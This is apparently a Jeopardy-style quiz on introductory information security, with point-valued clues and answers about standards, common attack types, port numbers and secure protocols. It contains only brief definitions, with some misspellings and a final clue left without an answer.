This standard usually abbreviated as CC defines the security requirements for a computer system when designing, assembling, delivering, installing, configuring, and initializing applications and data
What is Common Criteria?
100
A type of attack where people rather than systems are the target
What is social engineering
100
What is the minimum number port that you can choose as a non-privileged UNIX user to your service?
What is 1024
100
The secure version of MIME
What is SMIME
100
Refers to an unauthorized person listening to conversations of employees or other authorized personnel discussing sensitive topics
What is Eavesdropping
200
This standard governs private information in the health industry
what is HIPPA?
200
Occurs when the operating system or an application does not properly enforce boundaries for how much and what type of data can be inputted
What is Buffer-overflow
200
The standard port for File Transfer Protocol service
What is port 20/21(TCP)
200
Was developed by Netscape to secure Internet based client/server interactions
What is Secure Sockets Layer (SSL)
200
Refers to convincing personnel to grant access to sensitive information or protected systems by pretending to be someone who is authorized and/or requires that access
What is Masquerading, social engineering, pretexting?
300
This ISO standard is a specification for an information security management system (ISMS)
what is ISO 27001
300
It is an attack that injects scripts into Web pages. When the user views the Web page, the malicious scripts run allowing the attacker to capture information or perform other actions
What is Cross-site scripting (XSS)
300
Corresponding ports to Simple Mail Transfer Protocol (SMTP) service
Port 25 (TCP)
300
Was developed for the UNIX platform to encrypt or secure communications (think of it as replacement of plain telnet)
What is Secure Shell (SSH)
300
Causes the telephone network to display a number on the recipient's caller ID display that would imply that a call is coming from a legitimate source.
What is Caller ID spoofing, Fake caller ID, forged caller ID
400
This certificate says that ISC considers you a Systems Security Professional
what is CISSP?
400
This attack occurs when an attacker includes database commands within user data input fields on a form, and those commands subsequently execute on the server
What is SQL injection
400
This RDP port should be restricted in most machines to specific outside IP ranges
Port 3389
400
An asymmetric cryptosystem used for e-mail and file encryption, created by Phillip Zimmerman
What is Pretty Good Privacy (PGP)
400
is the use of a fictitious scenario to persuade someone to perform an action or give information for which they are not authorized (usually conducted by phone)
What is Pretexting
500
How many different individual certifications does AWS offer?
(clue: more than 4 less than 20)
What is 12?
500
Trying all possible combinations on a password or token
What is Brute Force? cracking?
500
Corresponding ports to Trivial File Transfer Protocol (TFTP) service
What is Port 69 UDP
500
A secure version of FTP
What is SFTP, SCP, FTPS
500
The most effective countermeasure for social engineering